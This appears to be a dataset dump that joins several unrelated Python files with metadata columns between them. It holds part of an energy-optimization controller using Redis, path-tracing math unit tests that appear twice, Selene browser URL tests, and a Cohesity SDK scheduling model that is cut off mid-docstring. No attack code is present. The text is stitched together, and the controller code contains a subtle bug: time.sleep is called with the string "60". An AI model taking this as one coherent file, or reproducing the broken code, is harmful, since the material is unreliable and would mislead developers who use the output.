raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
time.sleep("60") | en | 0.527412 | #from optimization.controllerStochasticTestPebble import OptControllerStochastic #restart = True # print(os.path.sep) # print(os.environ.get("HOME")) #self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id))) # Creating an object of the configuration file (standard values) # Loads the solver name if it was not given thorough the endpoint command/start/id # Loads the solver name if not specified in command/start/id ############################################################################################## # Reads the registry/output and stores it into an object # Reads the registry/input and stores it into an object # Reads the registry/input and stores it into an object # Initializing constructor of the optimization controller thread ####starts the optimization controller thread # stop as per ID | 1.931506 | 2 |
ptrace/oop/math_tests.py | xann16/py-path-tracing | 0 | 9142 | <filename>ptrace/oop/math_tests.py<gh_stars>0
"""Unit tests for math-oriented common classes."""
import unittest
import math
import numpy as np
from .vector import Vec3, OrthonormalBasis
from .raycast_base import Ray
from .camera import Camera
class Vec3Tests(unittest.TestCase):
"""Test for Vec3 class."""
def test_vec3_basic(self):
"""Basic creation, access and manipulation of vector components."""
zero = Vec3()
vvv = Vec3(1, 2, 3)
x_arr = np.array([.1, .2, .3], dtype='double')
xxx = Vec3.from_array(x_arr)
ones = Vec3.full(1.0)
i_hat = Vec3.versor(0)
self.assertEqual(zero[0], 0.0)
self.assertEqual(zero[1], 0.0)
self.assertEqual(zero[2], 0.0)
self.assertEqual(vvv[0], 1.0)
self.assertEqual(vvv[1], 2.0)
self.assertEqual(vvv[2], 3.0)
vvv[2] = 10
self.assertEqual(vvv[2], 10.0)
self.assertEqual(str(vvv), '[ 1. 2. 10.]')
self.assertEqual(xxx[0], .1)
self.assertEqual(xxx[1], .2)
self.assertEqual(xxx[2], .3)
self.assertEqual(ones[0], 1)
self.assertEqual(ones[1], 1)
self.assertEqual(ones[2], 1)
self.assertEqual(i_hat[0], 1)
self.assertEqual(i_hat[1], 0)
self.assertEqual(i_hat[2], 0)
is_v_eq = np.allclose(vvv.data(), np.array([1, 2, 10]))
self.assertEqual(is_v_eq, True)
is_x_eq = np.allclose(xxx.data(), x_arr)
self.assertEqual(is_x_eq, True)
self.assertEqual(vvv.copy(), vvv)
def test_vec3_arithmetic_and_comparisons(self):
"""Testing methods and operators used for arithmentic and comparisons.
"""
xxx = Vec3(1, 2, 3)
yyy = Vec3(1, 2, 3)
zzz = Vec3(1, 0, -1)
self.assertEqual(xxx == yyy, True)
self.assertEqual(xxx != yyy, False)
self.assertEqual(xxx != zzz, True)
self.assertEqual(xxx == zzz, False)
self.assertEqual(yyy != zzz, True)
self.assertEqual(yyy == zzz, False)
yyy += zzz
self.assertEqual(yyy, Vec3.full(2))
self.assertEqual(yyy + xxx, Vec3(3, 4, 5))
yyy -= zzz
self.assertEqual(yyy, xxx)
self.assertEqual(yyy - xxx, Vec3())
self.assertEqual(+xxx, xxx)
self.assertEqual(-xxx, Vec3(-1, -2, -3))
yyy *= -1
self.assertEqual(yyy, -xxx)
self.assertEqual(yyy * -1.0, xxx)
zzz /= 2
self.assertEqual(zzz, Vec3(.5, 0, -.5))
self.assertEqual(zzz / 2, Vec3(.25, 0, -.25))
vvv = Vec3(3, 1, -2)
vvv *= Vec3(2, .5, -1)
self.assertEqual(vvv, Vec3(6, .5, 2))
self.assertEqual(vvv * Vec3.full(2), Vec3(12, 1, 4))
www = Vec3.full(10)
www /= Vec3(10, 5, 2)
self.assertEqual(www, Vec3(1, 2, 5))
self.assertEqual(www / 2, Vec3(.5, 1, 2.5))
self.assertAlmostEqual(www.dot(Vec3()), 0)
self.assertAlmostEqual(Vec3(1, 2, 4).dot(Vec3(1, -2, 1)), 1)
self.assertEqual(Vec3.versor(0).cross(Vec3.versor(1)), Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(2)), Vec3.versor(0))
self.assertEqual(Vec3.versor(2).cross(Vec3.versor(0)), Vec3.versor(1))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(0)), -Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(1)), Vec3())
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2, 3)), True)
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2.0001, 3), 0.1), True)
def test_vec3_normalization(self):
"""Testing length calculations and normalisation."""
self.assertAlmostEqual(Vec3().sqr_length(), 0.0)
self.assertAlmostEqual(Vec3().length(), 0.0)
self.assertAlmostEqual(Vec3.versor(0).sqr_length(), 1.0)
self.assertAlmostEqual(Vec3.versor(1).length(), 1.0)
self.assertAlmostEqual(abs(Vec3.versor(2)), 1.0)
self.assertEqual(Vec3.versor(0).normalised(), Vec3.versor(0))
self.assertEqual(Vec3.versor(1).normalised(), Vec3.versor(1))
self.assertEqual(Vec3.versor(2).normalised(), Vec3.versor(2))
sqrt3 = math.sqrt(3)
v_sqrt3_inv = Vec3.full(1. / sqrt3)
self.assertAlmostEqual(Vec3.full(1).sqr_length(), 3)
self.assertAlmostEqual(Vec3.full(1).length(), sqrt3)
self.assertEqual(Vec3.full(1).normalised(), v_sqrt3_inv)
def test_vec3_reflection(self):
"""Testing reflection with respect to given normal vector."""
nnn = Vec3.versor(2)
self.assertEqual(nnn.reflect(Vec3.versor(0)), Vec3.versor(0))
self.assertEqual(nnn.reflect(Vec3.versor(2)), -Vec3.versor(2))
diag = Vec3(1, 1, 1).normalised()
diag_refl = diag.copy()
diag_refl[2] = -diag_refl[2]
self.assertEqual(nnn.reflect(diag), diag_refl)
class OrthonormalBasisTests(unittest.TestCase):
"""Tests for OrthonormalBasis class."""
def test_onb_basic(self):
"""Basic test reconstructing natural ONB."""
nat = OrthonormalBasis(Vec3.versor(0), Vec3.versor(1), Vec3.versor(2))
nat_alt = OrthonormalBasis.from_two('xy', Vec3.versor(0), Vec3.versor(1))
vvv = Vec3(1, 2, 3)
self.assertEqual(nat.transform(vvv), vvv)
self.assertEqual(nat_alt.transform(vvv), vvv)
def test_onb_factories(self):
"""Testing factory methods for creating ONBs from one or two vectors."""
onb1 = OrthonormalBasis.from_two('xy', Vec3(1, 2, 4).normalised(),\
Vec3(0, 0, -7).normalised())
self.assertAlmostEqual(abs(onb1.x_axis), 1.0)
self.assertAlmostEqual(abs(onb1.y_axis), 1.0)
self.assertAlmostEqual(abs(onb1.z_axis), 1.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.y_axis), 0.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.z_axis), 0.0)
self.assertAlmostEqual(onb1.y_axis.dot(onb1.z_axis), 0.0)
onb2 = OrthonormalBasis.from_two('zx', Vec3(-1, -1, -1).normalised(),\
Vec3(1, 1, -1).normalised())
self.assertAlmostEqual(abs(onb2.x_axis), 1.0)
self.assertAlmostEqual(abs(onb2.y_axis), 1.0)
self.assertAlmostEqual(abs(onb2.z_axis), 1.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.y_axis), 0.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.z_axis), 0.0)
self.assertAlmostEqual(onb2.y_axis.dot(onb2.z_axis), 0.0)
onb3 = OrthonormalBasis.from_z_axis(Vec3.versor(0))
self.assertAlmostEqual(abs(onb3.x_axis), 1.0)
self.assertAlmostEqual(abs(onb3.y_axis), 1.0)
self.assertAlmostEqual(abs(onb3.z_axis), 1.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.y_axis), 0.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.z_axis), 0.0)
self.assertAlmostEqual(onb3.y_axis.dot(onb3.z_axis), 0.0)
class RayTests(unittest.TestCase):
"""Tests for Ray class."""
def test_ray_basic(self):
"""Basic tests chcecking ray creation and probing their points."""
ox_axis = Ray(Vec3(), Vec3.versor(0))
self.assertEqual(ox_axis.point_at(4), Vec3(4, 0, 0))
direction = Vec3(1, -1, 0).normalised()
ray1 = Ray(Vec3(0, 2, 0), direction)
ray2 = Ray.from_points(Vec3(0, 2, 0), Vec3(2, 0, 0))
self.assertEqual(ray1.direction, direction)
self.assertEqual(ray2.direction, direction)
for i in range(10):
self.assertEqual(ray1.point_at(i), ray2.point_at(i))
self.assertEqual(ray1.point_at(0), ray1.origin)
self.assertEqual(ray2.point_at(0), ray2.origin)
class CameraTests(unittest.TestCase):
"""Tests for Camera class."""
def test_cam_basic(self):
"""Basic test checking if camera casts rays in correct direction."""
cam = Camera(Vec3(), Vec3.versor(0), Vec3.versor(2), 10, 10, 120)
cam.set_focus(Vec3.versor(0), 1.0)
for px_x in range(10):
for px_y in range(10):
ray = cam.get_ray(px_x, px_y)
self.assertGreaterEqual(ray.direction.dot(Vec3.versor(0)), 0.0)
if __name__ == '__main__':
unittest.main()
| <filename>ptrace/oop/math_tests.py<gh_stars>0
"""Unit tests for math-oriented common classes."""
import unittest
import math
import numpy as np
from .vector import Vec3, OrthonormalBasis
from .raycast_base import Ray
from .camera import Camera
class Vec3Tests(unittest.TestCase):
"""Test for Vec3 class."""
def test_vec3_basic(self):
"""Basic creation, access and manipulation of vector components."""
zero = Vec3()
vvv = Vec3(1, 2, 3)
x_arr = np.array([.1, .2, .3], dtype='double')
xxx = Vec3.from_array(x_arr)
ones = Vec3.full(1.0)
i_hat = Vec3.versor(0)
self.assertEqual(zero[0], 0.0)
self.assertEqual(zero[1], 0.0)
self.assertEqual(zero[2], 0.0)
self.assertEqual(vvv[0], 1.0)
self.assertEqual(vvv[1], 2.0)
self.assertEqual(vvv[2], 3.0)
vvv[2] = 10
self.assertEqual(vvv[2], 10.0)
self.assertEqual(str(vvv), '[ 1. 2. 10.]')
self.assertEqual(xxx[0], .1)
self.assertEqual(xxx[1], .2)
self.assertEqual(xxx[2], .3)
self.assertEqual(ones[0], 1)
self.assertEqual(ones[1], 1)
self.assertEqual(ones[2], 1)
self.assertEqual(i_hat[0], 1)
self.assertEqual(i_hat[1], 0)
self.assertEqual(i_hat[2], 0)
is_v_eq = np.allclose(vvv.data(), np.array([1, 2, 10]))
self.assertEqual(is_v_eq, True)
is_x_eq = np.allclose(xxx.data(), x_arr)
self.assertEqual(is_x_eq, True)
self.assertEqual(vvv.copy(), vvv)
def test_vec3_arithmetic_and_comparisons(self):
"""Testing methods and operators used for arithmentic and comparisons.
"""
xxx = Vec3(1, 2, 3)
yyy = Vec3(1, 2, 3)
zzz = Vec3(1, 0, -1)
self.assertEqual(xxx == yyy, True)
self.assertEqual(xxx != yyy, False)
self.assertEqual(xxx != zzz, True)
self.assertEqual(xxx == zzz, False)
self.assertEqual(yyy != zzz, True)
self.assertEqual(yyy == zzz, False)
yyy += zzz
self.assertEqual(yyy, Vec3.full(2))
self.assertEqual(yyy + xxx, Vec3(3, 4, 5))
yyy -= zzz
self.assertEqual(yyy, xxx)
self.assertEqual(yyy - xxx, Vec3())
self.assertEqual(+xxx, xxx)
self.assertEqual(-xxx, Vec3(-1, -2, -3))
yyy *= -1
self.assertEqual(yyy, -xxx)
self.assertEqual(yyy * -1.0, xxx)
zzz /= 2
self.assertEqual(zzz, Vec3(.5, 0, -.5))
self.assertEqual(zzz / 2, Vec3(.25, 0, -.25))
vvv = Vec3(3, 1, -2)
vvv *= Vec3(2, .5, -1)
self.assertEqual(vvv, Vec3(6, .5, 2))
self.assertEqual(vvv * Vec3.full(2), Vec3(12, 1, 4))
www = Vec3.full(10)
www /= Vec3(10, 5, 2)
self.assertEqual(www, Vec3(1, 2, 5))
self.assertEqual(www / 2, Vec3(.5, 1, 2.5))
self.assertAlmostEqual(www.dot(Vec3()), 0)
self.assertAlmostEqual(Vec3(1, 2, 4).dot(Vec3(1, -2, 1)), 1)
self.assertEqual(Vec3.versor(0).cross(Vec3.versor(1)), Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(2)), Vec3.versor(0))
self.assertEqual(Vec3.versor(2).cross(Vec3.versor(0)), Vec3.versor(1))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(0)), -Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(1)), Vec3())
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2, 3)), True)
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2.0001, 3), 0.1), True)
def test_vec3_normalization(self):
"""Testing length calculations and normalisation."""
self.assertAlmostEqual(Vec3().sqr_length(), 0.0)
self.assertAlmostEqual(Vec3().length(), 0.0)
self.assertAlmostEqual(Vec3.versor(0).sqr_length(), 1.0)
self.assertAlmostEqual(Vec3.versor(1).length(), 1.0)
self.assertAlmostEqual(abs(Vec3.versor(2)), 1.0)
self.assertEqual(Vec3.versor(0).normalised(), Vec3.versor(0))
self.assertEqual(Vec3.versor(1).normalised(), Vec3.versor(1))
self.assertEqual(Vec3.versor(2).normalised(), Vec3.versor(2))
sqrt3 = math.sqrt(3)
v_sqrt3_inv = Vec3.full(1. / sqrt3)
self.assertAlmostEqual(Vec3.full(1).sqr_length(), 3)
self.assertAlmostEqual(Vec3.full(1).length(), sqrt3)
self.assertEqual(Vec3.full(1).normalised(), v_sqrt3_inv)
def test_vec3_reflection(self):
"""Testing reflection with respect to given normal vector."""
nnn = Vec3.versor(2)
self.assertEqual(nnn.reflect(Vec3.versor(0)), Vec3.versor(0))
self.assertEqual(nnn.reflect(Vec3.versor(2)), -Vec3.versor(2))
diag = Vec3(1, 1, 1).normalised()
diag_refl = diag.copy()
diag_refl[2] = -diag_refl[2]
self.assertEqual(nnn.reflect(diag), diag_refl)
class OrthonormalBasisTests(unittest.TestCase):
"""Tests for OrthonormalBasis class."""
def test_onb_basic(self):
"""Basic test reconstructing natural ONB."""
nat = OrthonormalBasis(Vec3.versor(0), Vec3.versor(1), Vec3.versor(2))
nat_alt = OrthonormalBasis.from_two('xy', Vec3.versor(0), Vec3.versor(1))
vvv = Vec3(1, 2, 3)
self.assertEqual(nat.transform(vvv), vvv)
self.assertEqual(nat_alt.transform(vvv), vvv)
def test_onb_factories(self):
"""Testing factory methods for creating ONBs from one or two vectors."""
onb1 = OrthonormalBasis.from_two('xy', Vec3(1, 2, 4).normalised(),\
Vec3(0, 0, -7).normalised())
self.assertAlmostEqual(abs(onb1.x_axis), 1.0)
self.assertAlmostEqual(abs(onb1.y_axis), 1.0)
self.assertAlmostEqual(abs(onb1.z_axis), 1.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.y_axis), 0.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.z_axis), 0.0)
self.assertAlmostEqual(onb1.y_axis.dot(onb1.z_axis), 0.0)
onb2 = OrthonormalBasis.from_two('zx', Vec3(-1, -1, -1).normalised(),\
Vec3(1, 1, -1).normalised())
self.assertAlmostEqual(abs(onb2.x_axis), 1.0)
self.assertAlmostEqual(abs(onb2.y_axis), 1.0)
self.assertAlmostEqual(abs(onb2.z_axis), 1.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.y_axis), 0.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.z_axis), 0.0)
self.assertAlmostEqual(onb2.y_axis.dot(onb2.z_axis), 0.0)
onb3 = OrthonormalBasis.from_z_axis(Vec3.versor(0))
self.assertAlmostEqual(abs(onb3.x_axis), 1.0)
self.assertAlmostEqual(abs(onb3.y_axis), 1.0)
self.assertAlmostEqual(abs(onb3.z_axis), 1.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.y_axis), 0.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.z_axis), 0.0)
self.assertAlmostEqual(onb3.y_axis.dot(onb3.z_axis), 0.0)
class RayTests(unittest.TestCase):
"""Tests for Ray class."""
def test_ray_basic(self):
"""Basic tests chcecking ray creation and probing their points."""
ox_axis = Ray(Vec3(), Vec3.versor(0))
self.assertEqual(ox_axis.point_at(4), Vec3(4, 0, 0))
direction = Vec3(1, -1, 0).normalised()
ray1 = Ray(Vec3(0, 2, 0), direction)
ray2 = Ray.from_points(Vec3(0, 2, 0), Vec3(2, 0, 0))
self.assertEqual(ray1.direction, direction)
self.assertEqual(ray2.direction, direction)
for i in range(10):
self.assertEqual(ray1.point_at(i), ray2.point_at(i))
self.assertEqual(ray1.point_at(0), ray1.origin)
self.assertEqual(ray2.point_at(0), ray2.origin)
class CameraTests(unittest.TestCase):
"""Tests for Camera class."""
def test_cam_basic(self):
"""Basic test checking if camera casts rays in correct direction."""
cam = Camera(Vec3(), Vec3.versor(0), Vec3.versor(2), 10, 10, 120)
cam.set_focus(Vec3.versor(0), 1.0)
for px_x in range(10):
for px_y in range(10):
ray = cam.get_ray(px_x, px_y)
self.assertGreaterEqual(ray.direction.dot(Vec3.versor(0)), 0.0)
if __name__ == '__main__':
unittest.main()
| en | 0.823816 | Unit tests for math-oriented common classes. Test for Vec3 class. Basic creation, access and manipulation of vector components. Testing methods and operators used for arithmentic and comparisons. Testing length calculations and normalisation. Testing reflection with respect to given normal vector. Tests for OrthonormalBasis class. Basic test reconstructing natural ONB. Testing factory methods for creating ONBs from one or two vectors. Tests for Ray class. Basic tests chcecking ray creation and probing their points. Tests for Camera class. Basic test checking if camera casts rays in correct direction. | 2.447699 | 2 |
tests/integration/condition__browser__have_url_test.py | kianku/selene | 0 | 9143 | # MIT License
#
# Copyright (c) 2015-2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| # MIT License
#
# Copyright (c) 2015-2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| en | 0.731234 | # MIT License # # Copyright (c) 2015-2020 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # TODO: check message too # TODO: check message too | 1.825924 | 2 |
cohesity_management_sdk/models/scheduling_policy.py | chandrashekar-cohesity/management-sdk-python | 1 | 9144 | <reponame>chandrashekar-cohesity/management-sdk-python
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
monthly_schedule,
periodicity,
rpo_schedule)
| # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
